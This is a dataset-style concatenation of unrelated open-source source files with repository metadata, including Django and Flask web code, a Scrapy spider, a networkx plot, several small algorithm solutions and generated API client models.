diyajaiswal11/User_Advisor
|
bc2e6828f899e08dcf3a1ef0fbe041a8013c43b4
|
332001e874add115b19cccd2fb0b6622321f32c2
|
refs/heads/main
| 2023-04-17T07:48:24.801798
| 2021-04-25T11:25:30
| 2021-04-25T11:25:30
| 361,345,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 894
|
py
|
# Generated by Django 3.2 on 2021-04-25 09:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('advisor', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Booking',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('booking_time', models.DateTimeField()),
('advisor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='advisor.advisor')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='booking', to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"shubhijaiswal2000@gmail.com"
] |
shubhijaiswal2000@gmail.com
|
23495c8203860fae627a8100b1b8e2e9ba365996
|
e58b3b41505eea2848624c69282327b8531c5a9d
|
/apps/operations/adminx.py
|
10c0907278f8e6753f7998be043e6b8374d71df9
|
[] |
no_license
|
GoYMS/mxonline
|
9d4a9624921a389308896ddba9a817282e910532
|
3b9e27aaaf8f47a89083806cb8f885a5b8c31c36
|
refs/heads/master
| 2022-12-13T11:50:24.218015
| 2020-02-21T07:25:34
| 2020-02-21T07:25:34
| 242,054,819
| 1
| 0
| null | 2022-12-08T06:19:00
| 2020-02-21T04:34:42
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,608
|
py
|
import xadmin
from apps.operations.models import UserAsk,CourseComments,UserCourse,UserFavorite,UserMessage,Banner
class BannerAdmin(object):
list_display = ['title', 'image', 'url', 'datetime','index']
search_fields = ['title', 'image', 'url','index']
list_filter = ['title', 'image', 'url', 'datetime','index']
class UserAskAdmin(object):
list_display = ['title', 'image', 'url','index']
search_fields = ['title', 'image', 'url','index']
list_filter = ['title', 'image', 'url','index']
class UserCourseAdmin(object):
list_display = ['user', 'course', 'datetime']
search_fields = ['user', 'course']
list_filter = ['user', 'course', 'datetime']
class UserMessageAdmin(object):
list_display = ['user', 'message', 'has_read','datetime']
search_fields = ['user','message', 'has_read']
list_filter = ['user', 'message', 'has_read', 'datetime']
class CourseCommentsAdmin(object):
list_display = ['user', 'course','comments', 'datetime']
search_fields = ['user', 'course','comments']
list_filter = ['user', 'course', 'comments','datetime']
class UserFavoriteAdmin(object):
list_display = ['user', 'fav_id', 'fav_type', 'datetime']
search_fields = ['user', 'fav_id', 'fav_type']
list_filter = ['user', 'fav_id', 'fav_type', 'datetime']
xadmin.site.register(Banner,BannerAdmin)
xadmin.site.register(UserAsk,UserAskAdmin)
xadmin.site.register(UserCourse,UserCourseAdmin)
xadmin.site.register(UserMessage,UserMessageAdmin)
xadmin.site.register(CourseComments,CourseCommentsAdmin)
xadmin.site.register(UserFavorite,UserFavoriteAdmin)
|
[
"1789353033@qq.com"
] |
1789353033@qq.com
|
a8c9f7cf950293dcc4cd6b1a2029129783a07270
|
41bee87d712a9460ab2d79a7439cd9f98e861d63
|
/TgwlDataCenter/TgwlDataCenter/main/views.py
|
a4ea7f9d3fa2fca724acbb0daa9c2a22beb5e1aa
|
[] |
no_license
|
liulixiang1988/iis_flask_demo
|
e72e209281441521b2b952dbf3547a5dc6507ec1
|
f1d77f363b64fc52859c83fbffb6da563df561c4
|
refs/heads/master
| 2021-01-10T08:12:20.164278
| 2015-11-27T01:59:45
| 2015-11-27T01:59:45
| 46,954,319
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 949
|
py
|
# -*- coding:utf-8 -*-
from datetime import datetime
from flask import render_template
from TgwlDataCenter import db
from TgwlDataCenter.models import Fruit
from TgwlDataCenter.main import main
@main.route('/')
@main.route('/home')
def home():
"""Renders the home page."""
fruit = Fruit(fruit=u"苹果")
db.session.add(fruit)
db.session.commit()
return render_template(
'index.html',
title='Home Page',
year=datetime.now().year,
)
@main.route('/contact')
def contact():
"""Renders the contact page."""
return render_template(
'contact.html',
title='Contact',
year=datetime.now().year,
message='Your contact page.'
)
@main.route('/about')
def about():
"""Renders the about page."""
return render_template(
'about.html',
title='About',
year=datetime.now().year,
message='Your application description page.'
)
|
[
"liulixiang1988@gmail.com"
] |
liulixiang1988@gmail.com
|
2c896f2e371789e95671bb85e89272c49208ec25
|
52f00638c8773b001da5a341e16abc05934457f8
|
/rlpyt/agents/pg/mujoco.py
|
0ac8ff5e3dad5ea0dc9f92de401c713934064014
|
[
"MIT"
] |
permissive
|
abagaria/rlpyt
|
8e72dde5f3750c72da1fd8a97badf2c9691ea633
|
9d35217f2ecec60891753cf313d482d7887c16e1
|
refs/heads/master
| 2020-09-04T00:16:35.320779
| 2019-11-21T19:21:49
| 2019-11-21T19:21:49
| 219,614,849
| 0
| 1
|
MIT
| 2019-11-04T23:17:11
| 2019-11-04T23:17:10
| null |
UTF-8
|
Python
| false
| false
| 1,049
|
py
|
from rlpyt.agents.pg.gaussian import (GaussianPgAgent,
RecurrentGaussianPgAgent, AlternatingRecurrentGaussianPgAgent)
from rlpyt.models.pg.mujoco_ff_model import MujocoFfModel
from rlpyt.models.pg.mujoco_lstm_model import MujocoLstmModel
class MujocoMixin:
def make_env_to_model_kwargs(self, env_spaces):
assert len(env_spaces.action.shape) == 1
return dict(observation_shape=env_spaces.observation.shape,
action_size=env_spaces.action.shape[0])
class MujocoFfAgent(MujocoMixin, GaussianPgAgent):
def __init__(self, ModelCls=MujocoFfModel, **kwargs):
super().__init__(ModelCls=ModelCls, **kwargs)
class MujocoLstmAgent(MujocoMixin, RecurrentGaussianPgAgent):
def __init__(self, ModelCls=MujocoLstmModel, **kwargs):
super().__init__(ModelCls=ModelCls, **kwargs)
class AlternatingMujocoLstmAgent(MujocoMixin,
AlternatingRecurrentGaussianPgAgent):
def __init__(self, ModelCls=MujocoLstmModel, **kwargs):
super().__init__(ModelCls=ModelCls, **kwargs)
|
[
"adam.stooke@gmail.com"
] |
adam.stooke@gmail.com
|
72dc80d819fcaab11a208c849483dcbb988c9a1f
|
4a31308430d06cc3743e0dcc52501c0addd19008
|
/nodeA/p2p/core_node_list.py
|
a6782b3f7f3b6d28e02543a5bfab7d3c94796956
|
[] |
no_license
|
hyo07/bc2odpt-dev
|
b22ad08139c311164cabce63b547dd076df52c08
|
2f11ae5b4dad410ba66179c7701b2e25ceeff371
|
refs/heads/master
| 2022-12-12T18:16:23.250608
| 2020-11-06T07:23:06
| 2020-11-06T07:23:06
| 247,711,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,002
|
py
|
import threading
class CoreNodeList:
def __init__(self):
self.lock = threading.Lock()
self.list = set()
def add(self, peer):
"""
Coreノードをリストに追加する。
param:
peer : Coreノードとして格納されるノードの接続情報(IPアドレスとポート番号)
"""
with self.lock:
print('Adding peer: ', peer)
self.list.add((peer))
print('Current Core List: ', self.list)
def remove(self, peer):
"""
離脱したと判断されるCoreノードをリストから削除する。
param:
peer : 削除するノードの接続先情報(IPアドレスとポート番号)
"""
with self.lock:
if peer in self.list:
print('Removing peer: ', peer)
self.list.remove(peer)
print('Current Core list: ', self.list)
def overwrite(self, new_list):
"""
複数のpeerの生存確認を行った後で一括での上書き処理をしたいような場合はこちら
"""
with self.lock:
print('core node list will be going to overwrite')
self.list = new_list
print('Current Core list: ', self.list)
def get_list(self):
"""
現在接続状態にあるPeerの一覧を返却する
"""
li = set(self.list)
return li
def get_length(self):
return len(self.list)
def get_c_node_info(self):
"""
リストのトップにあるPeerを返却する
"""
return list(self.list)[0]
def has_this_peer(self, peer):
"""
与えられたpeerがリストに含まれているか?をチェックする
param:
peer : IPアドレスとポート番号のタプル
return:
True or False
"""
return peer in self.list
|
[
"yutaka727kato@gmail.com"
] |
yutaka727kato@gmail.com
|
084e4cf81257ae12d846254bbff0055434fc7d89
|
e97e727972149063b3a1e56b38961d0f2f30ed95
|
/test/test_double_operation_resource.py
|
31eb32a0b4acb0777dcf050bca89159001193ac1
|
[] |
no_license
|
knetikmedia/knetikcloud-python-client
|
f3a485f21c6f3e733a864194c9acf048943dece7
|
834a24415385c906732437970db105e1bc71bde4
|
refs/heads/master
| 2021-01-12T10:23:35.307479
| 2018-03-14T16:04:24
| 2018-03-14T16:04:24
| 76,418,830
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,073
|
py
|
# coding: utf-8
"""
Knetik Platform API Documentation latest
This is the spec for the Knetik API. Use this in conjunction with the documentation found at https://knetikcloud.com.
OpenAPI spec version: latest
Contact: support@knetik.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import knetik_cloud
from knetik_cloud.rest import ApiException
from knetik_cloud.models.double_operation_resource import DoubleOperationResource
class TestDoubleOperationResource(unittest.TestCase):
""" DoubleOperationResource unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testDoubleOperationResource(self):
"""
Test DoubleOperationResource
"""
# FIXME: construct object with mandatory attributes with example values
#model = knetik_cloud.models.double_operation_resource.DoubleOperationResource()
pass
if __name__ == '__main__':
unittest.main()
|
[
"shawn.stout@knetik.com"
] |
shawn.stout@knetik.com
|
c5e3cf8ccaee00baf6e761221f47c8375c551c50
|
35b6013c1943f37d1428afd2663c8aba0a02628d
|
/enterpriseknowledgegraph/search/lookup_sample_test.py
|
14bb48921ebb2818291664e810db90c14a1145eb
|
[
"Apache-2.0"
] |
permissive
|
GoogleCloudPlatform/python-docs-samples
|
d2a251805fbeab15d76ed995cf200727f63f887d
|
44e819e713c3885e38c99c16dc73b7d7478acfe8
|
refs/heads/main
| 2023-08-28T12:52:01.712293
| 2023-08-28T11:18:28
| 2023-08-28T11:18:28
| 35,065,876
| 7,035
| 7,593
|
Apache-2.0
| 2023-09-14T20:20:56
| 2015-05-04T23:26:13
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,013
|
py
|
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import lookup_sample
project_id = os.environ["GOOGLE_CLOUD_PROJECT"]
location = "global"
ids = ["c-024dcv3mk"]
languages = ["en"]
def test_lookup(capsys):
lookup_sample.lookup_sample(
project_id=project_id,
location=location,
ids=ids,
languages=languages,
)
out, _ = capsys.readouterr()
assert "Name: Google" in out
assert "Types" in out
assert "Cloud MID" in out
|
[
"noreply@github.com"
] |
GoogleCloudPlatform.noreply@github.com
|
d7c11080139ed0bff1800582fef010d1bedb96c7
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_201/1514.py
|
0f27373d40ddcd82cb07423f15c79eea3f3c6422
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 736
|
py
|
from math import floor, ceil
def get_result(num, k):
if num == k:
return 0, 0
if num == 2:
return 1, 0
if k == 1:
if num % 2 == 0:
return (num / 2), (num / 2) - 1
else:
return (num - 1) / 2, (num - 1) / 2
num_1 = ceil((num - 1) / 2)
num_2 = floor((num - 1) / 2)
if k % 2 == 0:
return get_result(num_1, ceil((k - 1) / 2))
else:
return get_result(num_2, floor((k - 1) / 2))
def solve():
n, k = [int(s) for s in input().split(" ")]
return get_result(n, k)
t = int(input())
for i in range(1, t + 1):
result = solve()
print("Case #{}: {} {}".format(i, int(result[0]), int(result[1])))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
615a7ce2809c9bdded6aa8d12c3fb35fe9b1ec63
|
d094ba0c8a9b1217fbf014aa79a283a49aabe88c
|
/env/share/doc/networkx-2.2/examples/drawing/plot_four_grids.py
|
9123bb27725a34a30be61f73d9402afefc496e05
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
Raniac/NEURO-LEARN
|
d9274e0baadd97bb02da54bdfcf6ca091fc1c703
|
3c3acc55de8ba741e673063378e6cbaf10b64c7a
|
refs/heads/master
| 2022-12-25T23:46:54.922237
| 2020-09-06T03:15:14
| 2020-09-06T03:15:14
| 182,013,100
| 9
| 2
|
Apache-2.0
| 2022-12-09T21:01:00
| 2019-04-18T03:57:00
|
CSS
|
UTF-8
|
Python
| false
| false
| 838
|
py
|
#!/usr/bin/env python
"""
==========
Four Grids
==========
Draw a graph with matplotlib.
You must have matplotlib for this to work.
"""
# Author: Aric Hagberg (hagberg@lanl.gov)
# Copyright (C) 2004-2018
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
import matplotlib.pyplot as plt
import networkx as nx
G = nx.grid_2d_graph(4, 4) # 4x4 grid
pos = nx.spring_layout(G, iterations=100)
plt.subplot(221)
nx.draw(G, pos, font_size=8)
plt.subplot(222)
nx.draw(G, pos, node_color='k', node_size=0, with_labels=False)
plt.subplot(223)
nx.draw(G, pos, node_color='g', node_size=250, with_labels=False, width=6)
plt.subplot(224)
H = G.to_directed()
nx.draw(H, pos, node_color='b', node_size=20, with_labels=False)
plt.show()
|
[
"leibingye@outlook.com"
] |
leibingye@outlook.com
|
2fcd265f4cfb612be33f39b9c2a640b0e8ebb430
|
fd18ce27b66746f932a65488aad04494202e2e0d
|
/d11_spider/codes/Adv_Spider/Adv_Spider/spiders/baidu_request.py
|
2700834d6cf9b738aef84a4995acbedad18f4c50
|
[] |
no_license
|
daofeng123/ClassCodes
|
1acbd843836e550c9cebf67ef21dfca9f6b9fc87
|
fbcd1f24d79b8bb56ad0669b07ad118064609612
|
refs/heads/master
| 2020-06-24T12:34:28.148197
| 2019-08-15T03:56:40
| 2019-08-15T03:56:40
| 198,963,469
| 3
| 0
| null | 2019-07-26T06:53:45
| 2019-07-26T06:53:44
| null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
# -*- coding: utf-8 -*-
import json
import scrapy
import scrapy.http
class BaiduRequestSpider(scrapy.Spider):
name = 'baidu_request'
allowed_domains = ['fanyi.baidu.com']
start_urls = ['https://fanyi.baidu.com/sug']
def start_requests(self):
# Request
headers = {
'content-type': 'application/x-www-form-urlencoded',
}
trnaslator_1 = scrapy.Request(
url=self.start_urls[0],
callback=self.get_translate,
method='POST', # 官方文档说需要大小,实际大小写都没有问题
headers=headers, # --> 指定表单格式
dont_filter=True, # 同一个请求url,防止被过滤
body='kw=test'.encode()) # 使用body提交,必须手工指定表单格式
# FormRequest
form = {
'kw': 'test'
}
trnaslator_2 = scrapy.FormRequest(
url=self.start_urls[0],
callback=self.get_translate,
dont_filter=True,
formdata=form) # 不适合使用表单提交
return [trnaslator_1, trnaslator_2]
def get_translate(self, response):
print('--------------------')
result = json.loads(response.text)
print(result)
|
[
"38395870@qq.com"
] |
38395870@qq.com
|
703e62e2db63fdf7b1f11b8d7276719c0d544cd9
|
3f9e960174cfc5c8bd6827ce5362124c467a3952
|
/python/data_structure/api_fields_values_histogram.py
|
09fed45101551344fdd765d4719736c3bf9bb234
|
[] |
no_license
|
monobinab/python
|
f3ec6d462d7149c007ac9e14e72132eae73b4acd
|
265621b045969c819eb86fa7ba2a3bdfad34ecb6
|
refs/heads/master
| 2020-12-03T00:04:29.185880
| 2017-07-01T18:53:11
| 2017-07-01T20:06:16
| 95,982,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 792
|
py
|
#!/usr/bin/env python
#this script parses storm log files and creates pipe delilited storm log files
import sys
from datetime import date, timedelta, datetime
#from dateutil import parser
counts = dict()
tmp_lst = list()
# input comes from STDIN (standard input)
for line in sys.stdin:
client = ""
try:
if line is not None and "api: response" in line:
fields = line.split("|")
client = fields[3].strip()
counts[client] = counts.get(client, 0) + 1
except:
continue;
#print('%s' % (counts))
for key, val in counts.items():
tmp_lst.append((key, val))
for k,v in tmp_lst:
outline = str(k) + "|" + str(v)
print('%s' % (outline))
#print('%s' % (outline))
#outline = counts
|
[
"monobina.saha@searshc.com"
] |
monobina.saha@searshc.com
|
7bd38216ab778e3afaf00fe52d4e142572267d0c
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03862/s008273879.py
|
920a1b732a14199ec1f52a59849810aee0710dc2
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 210
|
py
|
n, x = map(int, input().split())
A = list(map(int, input().split()))
ans = 0
for i in range(n - 1):
if A[i] + A[i + 1] > x:
ans += A[i] + A[i + 1] - x
A[i + 1] = max(x - A[i], 0)
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
246f7e3ba7f6dd25ba307531bd7af5a603be58c7
|
802c002ecd90be6b489e0250ec4454a11c17ed1d
|
/src/homework/homework13/main_homework7.py
|
301a2f393bbefdf4b2ea9b60e17fa62bb2949b97
|
[
"MIT"
] |
permissive
|
acc-cosc-1336/cosc-1336-spring-2018-EricScotty
|
3a088285ae853a9ff5d747f2301f755c5e3749b3
|
80c0249a583dc178cfc7bb95b851d7f3240dc3e9
|
refs/heads/master
| 2021-09-14T05:54:02.132705
| 2018-05-08T23:27:04
| 2018-05-08T23:27:04
| 118,071,042
| 0
| 0
|
MIT
| 2018-04-23T02:51:05
| 2018-01-19T03:22:13
|
Python
|
UTF-8
|
Python
| false
| false
| 969
|
py
|
from src.homework.homework7 import get_p_distance_matrix, print_get_p_distance_matrix
'''
Write a main function to...
Read p_distance.dat file
From the file data, create a two-dimensional list like the following example:
[
['T','T','T','C','C','A','T','T','T','A'],
['G','A','T','T','C','A','T','T','T','C'],
['T','T','T','C','C','A','T','T','T','T'],
['G','T','T','C','C','A','T','T','T','A']
]
Pass the list to the get_p_distance_matrix function as an argument
Display the p distance matrix to screen
'''
def main():
matrix = []
file_object = open('p_distance.dat', 'r')
content = file_object.readlines()
for line in content[:]:
line = line.rstrip('\n').replace(" ", "")
matrix_line = []
for letter in line:
matrix_line.append(letter)
matrix.append(matrix_line)
results_mtrx = get_p_distance_matrix(matrix)
print_get_p_distance_matrix(results_mtrx)
main()
|
[
"noreply@github.com"
] |
acc-cosc-1336.noreply@github.com
|
1dbb1088e45851aaa83d57c2a6646e4158d3da5a
|
d746f9f262961fd4c65eb332d8325f7fdacf3757
|
/dingureu/settings.py
|
f9c67e688925e9835faf2ffc1592a29418a4d0d6
|
[] |
no_license
|
Ganodab-Brothers/dingureu-django-backend
|
c69c84e48c64874bb283fec07dee2c203fca6b08
|
2aa37bbdd5c8b003b0e73854c2eca23a3deccb06
|
refs/heads/master
| 2023-04-20T21:10:26.686591
| 2021-04-28T00:33:39
| 2021-04-28T00:33:39
| 359,873,187
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,866
|
py
|
"""
Django settings for dingureu project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
from config import envs
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = envs.SECRET_KEY
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = envs.DEBUG == 'true'
ALLOWED_HOSTS = ["*"]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'drf_yasg',
'user',
'file',
'article',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dingureu.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dingureu.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': envs.DB_HOST,
'PORT': envs.DB_PORT,
'USER': envs.DB_USER,
'PASSWORD': envs.DB_PASSWORD,
'NAME': envs.DB_NAME,
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':
'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR / 'static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
AUTH_USER_MODEL = 'user.User'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES':
('rest_framework_simplejwt.authentication.JWTAuthentication', )
}
SWAGGER_SETTINGS = {
'SECURITY_DEFINITIONS': {
'Bearer': {
'type': 'apiKey',
'name': 'Authorization',
'in': 'header',
}
},
'USE_SESSION_AUTH': False,
}
|
[
"code.yeon.gyu@gmail.com"
] |
code.yeon.gyu@gmail.com
|
651237ce3104a4d44722f7c75a12ee6769a94487
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03937/s470682175.py
|
1480749348da6cfb1296018b442d2120f2ab5b1e
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
H,W=map(int,input().split())
field=[]
for i in range(H):
s=input()
a=[]
for j in range(W):
a.append(s[j])
field.append(a)
def dfs(x,y):
field[x][y]='.'
dx=[0,1]
dy=[1,0]
for i in range(2):
nx=x+dx[i]
ny=y+dy[i]
if 0<=nx and nx<H and 0<=ny and ny<W and field[nx][ny]=="#":
dfs(nx,ny)
break
return
dfs(0,0)
for i in range(H):
for j in range(W):
if field[i][j]=='#':
print('Impossible')
exit()
print('Possible')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
1d6b97e765f3a7f16caed9f39bd488474adf650e
|
b0dbd2e4dd83fe012cde29c8474bae5e33c23e2a
|
/harbor_client/model/robot_create_v1.py
|
2f99d134e25272b617002f74eb94bb0b6fce1cd4
|
[] |
no_license
|
DevotionZhu/harbor-python-client-api
|
0ba3999e5af126dbe97f0234c4a9601660a97dbb
|
f0cc6c453b488d5f456eff94000156182eb3a468
|
refs/heads/master
| 2023-04-17T22:06:06.024871
| 2021-04-11T22:20:28
| 2021-04-11T22:20:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,200
|
py
|
"""
Harbor API
These APIs provide services for manipulating Harbor project. # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from harbor_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from harbor_client.model.access import Access
globals()['Access'] = Access
class RobotCreateV1(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'name': (str,), # noqa: E501
'description': (str,), # noqa: E501
'expires_at': (int,), # noqa: E501
'access': ([Access],), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'name': 'name', # noqa: E501
'description': 'description', # noqa: E501
'expires_at': 'expires_at', # noqa: E501
'access': 'access', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""RobotCreateV1 - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
name (str): The name of robot account. [optional] # noqa: E501
description (str): The description of robot account. [optional] # noqa: E501
expires_at (int): The expiration time on or after which the JWT MUST NOT be accepted for processing.. [optional] # noqa: E501
access ([Access]): The permission of robot account. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
|
[
"vb@container-registry.com"
] |
vb@container-registry.com
|
80acd454dc42c8718c69d967d6cb1d86e6ac4d21
|
a9e81c87022fdde86d47a4ec1e74791da8aa0e30
|
/tensorflow-learning/base/loss-function/03-sigmoid.py
|
0f8dabd13b8e2db95a38496a8efb6bcc08f2cfd1
|
[
"Apache-2.0"
] |
permissive
|
ymli1997/deeplearning-notes
|
c5c6926431b7efc1c6823d85e3eb470f3c986494
|
f2317d80cd998305814f988e5000241797205b63
|
refs/heads/master
| 2020-07-29T11:15:43.689307
| 2018-05-05T10:58:18
| 2018-05-05T10:58:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
# -*- coding:utf-8 -*-
import numpy as np
import tensorflow as tf
